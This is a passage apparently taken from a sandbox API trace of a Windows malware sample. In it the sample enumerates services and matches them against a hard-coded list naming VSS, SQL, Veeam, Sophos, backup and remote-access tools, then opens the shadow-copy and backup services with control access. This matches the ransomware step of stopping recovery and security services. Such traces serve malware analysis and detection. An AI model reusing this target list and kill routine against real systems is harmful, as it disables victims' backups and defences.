Size=0xead4) returned 0x3581770 [0112.718] EnumServicesStatusA (in: hSCManager=0x357eb40, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x3581770, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x3581770*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0112.898] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0112.899] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0112.899] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0112.900] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0112.901] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0112.902] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0112.903] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0112.904] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0112.905] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0112.906] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0112.907] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0112.908] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0112.909] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0112.914] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0112.914] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0112.914] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0112.915] OpenServiceA (hSCManager=0x357eb40, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x357ec30 [0112.916] QueryServiceStatusEx (in: hService=0x357ec30, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0112.916] CloseServiceHandle (hSCObject=0x357ec30) returned 1 [0112.916] OpenServiceA (hSCManager=0x357eb40, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x357eaa0 [0112.917] QueryServiceStatusEx (in: hService=0x357eaa0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0112.917] CloseServiceHandle (hSCObject=0x357eaa0) returned 1 [0113.261] OpenServiceA (hSCManager=0x357eb40, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x357ec30 [0113.261] QueryServiceStatusEx (in: hService=0x357ec30, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0113.262] CloseServiceHandle (hSCObject=0x357ec30) returned 1 [0113.273] GetProcessHeap () returned 0x3520000 [0113.273] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3581770 | out: hHeap=0x3520000) returned 1 [0113.274] CloseServiceHandle (hSCObject=0x357eb40) returned 1 [0113.519] SetEvent (hEvent=0x20c) returned 1 [0113.519] Sleep (dwMilliseconds=0x2710) [0125.030] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x35858a0 [0125.101] EnumServicesStatusA (in: hSCManager=0x35858a0, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0125.105] GetLastError () returned 0xea [0125.105] GetProcessHeap () returned 0x3520000 [0125.105] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x3586780 [0125.106] EnumServicesStatusA (in: hSCManager=0x35858a0, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x3586780, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x3586780*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0125.218] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0125.218] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0125.219] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0125.220] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0125.221] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0125.222] StrStrIA 